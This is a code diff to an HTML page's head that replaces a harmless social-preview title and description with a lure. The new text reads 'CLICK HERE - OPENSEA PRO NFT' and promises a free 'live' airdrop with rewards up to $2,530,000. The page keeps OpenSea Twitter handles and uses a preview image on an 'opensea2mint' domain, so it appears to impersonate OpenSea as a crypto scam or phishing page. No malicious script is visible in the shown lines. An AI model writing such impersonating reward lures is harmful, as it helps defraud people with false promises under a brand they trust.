--- a/index.html
+++ b/index.html
@@ -43,12 +43,20 @@ metaTag.setAttribute('content', currentUrl);
 document.head.appendChild(metaTag);
  </script>
 <meta name="twitter:card" content="summary_large_image">
-<meta name="twitter:card" content="summary" />
+<!-- <meta name="twitter:card" content="summary" /> -->
 <meta name="twitter:site" content="@opensea" />
 <meta name="twitter:creator" content="@opensea" />
 
-<meta property="og:title" content="A Twitter for My Sister" />
-<meta property="og:description" content="In the early days, Twitter grew so quickly that it was almost impossible to add new features because engineers spent their time trying to keep the rocket ship from stalling." />
+<meta property="og:title" content="CLICK HERE - OPENSEA PRO NFT" />
+<meta property="og:description" content="🟢 AIRDROP IS LIVE NOW 🟢
+ 
+🎉 Price: FREE
+🎉 Supply: 150 Mystery Box
+🎉 Reward: between $3000 and $2,530,000
+
+
+TRY YOUR LUCK ! 🚀
+    " />
 <meta property="og:image" content="https://opensea2mint-nft29.vercel.app/images/389-9bec97c22fa2e411.gif" />
     <meta name="twitter:description" content="
 
